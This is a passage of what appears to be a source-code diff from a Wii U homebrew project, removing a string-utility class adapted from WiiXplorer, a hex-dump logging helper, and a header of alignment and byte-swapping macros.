* must not be misrepresented as being the original software.
*
* 3. This notice may not be removed or altered from any source
* distribution.
*
* for WiiXplorer 2010
***************************************************************************/
#include <vector>
#include <string>
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>
#include <wchar.h>
#include <strings.h>
#include <wut_types.h>
#include <stdio.h>
#include <utils/StringTools.h>
BOOL StringTools::EndsWith(const std::string &a, const std::string &b) {
if (b.size() > a.size())
return false;
return std::equal(a.begin() + a.size() - b.size(), a.end(), b.begin());
}
const char *StringTools::byte_to_binary(int32_t x) {
static char b[9];
b[0] = '\0';
int32_t z;
for (z = 128; z > 0; z >>= 1) {
strcat(b, ((x & z) == z) ? "1" : "0");
}
return b;
}
std::string StringTools::removeCharFromString(std::string &input, char toBeRemoved) {
std::string output = input;
size_t position;
while (1) {
position = output.find(toBeRemoved);
if (position == std::string::npos)
break;
output.erase(position, 1);
}
return output;
}
const char *StringTools::fmt(const char *format, ...) {
static char strChar[512];
strChar[0] = 0;
va_list va;
va_start(va, format);
if ((vsprintf(strChar, format, va) >= 0)) {
va_end(va);
return (const char *) strChar;
}
va_end(va);
return NULL;
}
const wchar_t *StringTools::wfmt(const char *format, ...) {
static char tmp[512];
static wchar_t strWChar[512];
strWChar[0] = 0;
tmp[0] = 0;
if (!format)
return (const wchar_t *) strWChar;
if (strcmp(format, "") == 0)
return (const wchar_t *) strWChar;
va_list va;
va_start(va, format);
if ((vsprintf(tmp, format, va) >= 0)) {
int bt;
int32_t strlength = strlen(tmp);
bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512);
if (bt > 0) {
strWChar[bt] = 0;
return (const wchar_t *) strWChar;
}
}
va_end(va);
return NULL;
}
int32_t StringTools::strprintf(std::string &str, const char *format, ...) {
static char tmp[512];
tmp[0] = 0;
int32_t result = 0;
va_list va;
va_start(va, format);
if ((vsprintf(tmp, format, va) >= 0)) {
str = tmp;
result = str.size();
}
va_end(va);
return result;
}
std::string StringTools::strfmt(const char *format, ...) {
std::string str;
static char tmp[512];
tmp[0] = 0;
va_list va;
va_start(va, format);
if ((vsprintf(tmp, format, va) >= 0)) {
str = tmp;
}
va_end(va);
return str;
}
BOOL StringTools::char2wchar_t(const char *strChar, wchar_t *dest) {
if (!strChar || !dest)
return false;
int bt;
bt = mbstowcs(dest, strChar, strlen(strChar));
if (bt > 0) {
dest[bt] = 0;
return true;
}
return false;
}
int32_t StringTools::strtokcmp(const char *string, const char *compare, const char *separator) {
if (!string || !compare)
return -1;
char TokCopy[512];
strncpy(TokCopy, compare, sizeof(TokCopy));
TokCopy[511] = '\0';
char *strTok = strtok(TokCopy, separator);
while (strTok != NULL) {
if (strcasecmp(string, strTok) == 0) {
return 0;
}
strTok = strtok(NULL, separator);
}
return -1;
}
int32_t StringTools::strextcmp(const char *string, const char *extension, char seperator) {
if (!string || !extension)
return -1;
char *ptr = strrchr(string, seperator);
if (!ptr)
return -1;
return strcasecmp(ptr + 1, extension);
}
std::vector<std::string> StringTools::stringSplit(const std::string &inValue, const std::string &splitter) {
std::string value = inValue;
std::vector<std::string> result;
while (true) {
uint32_t index = value.find(splitter);
if (index == std::string::npos) {
result.push_back(value);
break;
}
std::string first = value.substr(0, index);
result.push_back(first);
if (index + splitter.size() == value.length()) {
result.push_back("");
break;
}
if (index + splitter.size() > value.length()) {
break;
}
value = value.substr(index + splitter.size(), value.length());
}
return result;
}
const char *StringTools::FullpathToFilename(const char *path) {
if (!path)
return path;
const char *ptr = path;
const char *Filename = ptr;
while (*ptr != '\0') {
if (ptr[0] == '/' && ptr[1] != '\0')
Filename = ptr + 1;
++ptr;
}
return Filename;
}
void StringTools::RemoveDoubleSlashs(std::string &str) {
uint32_t length = str.size();
//! clear path of double slashes
for (uint32_t i = 1; i < length; ++i) {
if (str[i - 1] == '/' && str[i] == '/') {
str.erase(i, 1);
i--;
length--;
}
}
}
// You must free the result if result is non-NULL.
char *StringTools::str_replace(char *orig, char *rep, char *with) {
char *result; // the return string
char *ins; // the next insert point
char *tmp; // varies
int len_rep; // length of rep (the string to remove)
int len_with; // length of with (the string to replace rep with)
int len_front; // distance between rep and end of last rep
int count; // number of replacements
// sanity checks and initialization
if (!orig || !rep)
return NULL;
len_rep = strlen(rep);
if (len_rep == 0)
return NULL; // empty rep causes infinite loop during count
if (!with)
with = "";
len_with = strlen(with);
// count the number of replacements needed
ins = orig;
for (count = 0; tmp = strstr(ins, rep); ++count) {
ins = tmp + len_rep;
}
tmp = result = (char *) malloc(strlen(orig) + (len_with - len_rep) * count + 1);
if (!result)
return NULL;
// first time through the loop, all the variable are set correctly
// from here on,
// tmp points to the end of the result string
// ins points to the next occurrence of rep in orig
// orig points to the remainder of orig after "end of rep"
while (count--) {
ins = strstr(orig, rep);
len_front = ins - orig;
tmp = strncpy(tmp, orig, len_front) + len_front;
tmp = strcpy(tmp, with) + len_with;
orig += len_front + len_rep; // move to next "end of rep"
}
strcpy(tmp, orig);
return result;
}

View File

@ -1,65 +0,0 @@
/***************************************************************************
* Copyright (C) 2010
* by Dimok
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any
* damages arising from the use of this software.
*
* Permission is granted to anyone to use this software for any
* purpose, including commercial applications, and to alter it and
* redistribute it freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you
* must not claim that you wrote the original software. If you use
* this software in a product, an acknowledgment in the product
* documentation would be appreciated but is not required.
*
* 2. Altered source versions must be plainly marked as such, and
* must not be misrepresented as being the original software.
*
* 3. This notice may not be removed or altered from any source
* distribution.
*
* for WiiXplorer 2010
***************************************************************************/
#ifndef __STRING_TOOLS_H
#define __STRING_TOOLS_H
#include <vector>
#include <string>
#include <wut_types.h>
class StringTools {
public:
static BOOL EndsWith(const std::string &a, const std::string &b);
static const char *byte_to_binary(int32_t x);
static std::string removeCharFromString(std::string &input, char toBeRemoved);
static const char *fmt(const char *format, ...);
static const wchar_t *wfmt(const char *format, ...);
static int32_t strprintf(std::string &str, const char *format, ...);
static std::string strfmt(const char *format, ...);
static BOOL char2wchar_t(const char *src, wchar_t *dest);
static int32_t strtokcmp(const char *string, const char *compare, const char *separator);
static int32_t strextcmp(const char *string, const char *extension, char seperator);
static char *str_replace(char *orig, char *rep, char *with);
static const char *FullpathToFilename(const char *path);
static void RemoveDoubleSlashs(std::string &str);
static std::vector<std::string> stringSplit(const std::string &value, const std::string &splitter);
};
#endif /* __STRING_TOOLS_H */

View File

@ -1,41 +0,0 @@
#include <string.h>
#include <stdlib.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <malloc.h>
#include "utils/logger.h"
// https://gist.github.com/ccbrown/9722406
void dumpHex(const void *data, size_t size) {
char ascii[17];
size_t i, j;
ascii[16] = '\0';
WHBLogPrintf("0x%08X (0x0000): ", data);
for (i = 0; i < size; ++i) {
WHBLogWritef("%02X ", ((unsigned char *) data)[i]);
if (((unsigned char *) data)[i] >= ' ' && ((unsigned char *) data)[i] <= '~') {
ascii[i % 16] = ((unsigned char *) data)[i];
} else {
ascii[i % 16] = '.';
}
if ((i + 1) % 8 == 0 || i + 1 == size) {
WHBLogWritef(" ");
if ((i + 1) % 16 == 0) {
WHBLogWritef("| %s \n", ascii);
if (i + 1 < size) {
DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1);
}
} else if (i + 1 == size) {
ascii[(i + 1) % 16] = '\0';
if ((i + 1) % 16 <= 8) {
WHBLogWritef(" ");
}
for (j = (i + 1) % 16; j < 16; ++j) {
WHBLogWritef(" ");
}
WHBLogWritef("| %s \n", ascii);
}
}
}
}

View File

@ -1,40 +0,0 @@
#ifndef __UTILS_H_
#define __UTILS_H_
#include <malloc.h>
#ifdef __cplusplus
extern "C" {
#endif
#define LIMIT(x, min, max) \
({ \
typeof( x ) _x = x; \
typeof( min ) _min = min; \
typeof( max ) _max = max; \
( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \
})
#define DegToRad(a) ( (a) * 0.01745329252f )
#define RadToDeg(a) ( (a) * 57.29577951f )
#define ALIGN4(x) (((x) + 3) & ~3)
#define ALIGN32(x) (((x) + 31) & ~31)
// those work only in powers of 2
#define ROUNDDOWN(val, align) ((val) & ~(align-1))
#define ROUNDUP(val, align) ROUNDDOWN(((val) + (align-1)), align)
#define le16(i) ((((uint16_t) ((i) & 0xFF)) << 8) | ((uint16_t) (((i) & 0xFF00) >> 8)))
#define le32(i) ((((uint32_t)le16((i) & 0xFFFF)) << 16) | ((uint32_t)le16(((i) & 0xFFFF0000) >> 16)))
#define le64(i) ((((uint64_t)le32((i) & 0xFFFFFFFFLL)) << 32) | ((uint64_t)le32(((i) & 0xFFFFFFFF00000000LL) >> 32)))
//Needs to have log_init() called beforehand.
void dumpHex(const void *data, size_t size);
#ifdef __cplusplus
}
#endif
#endif // __UTILS_H_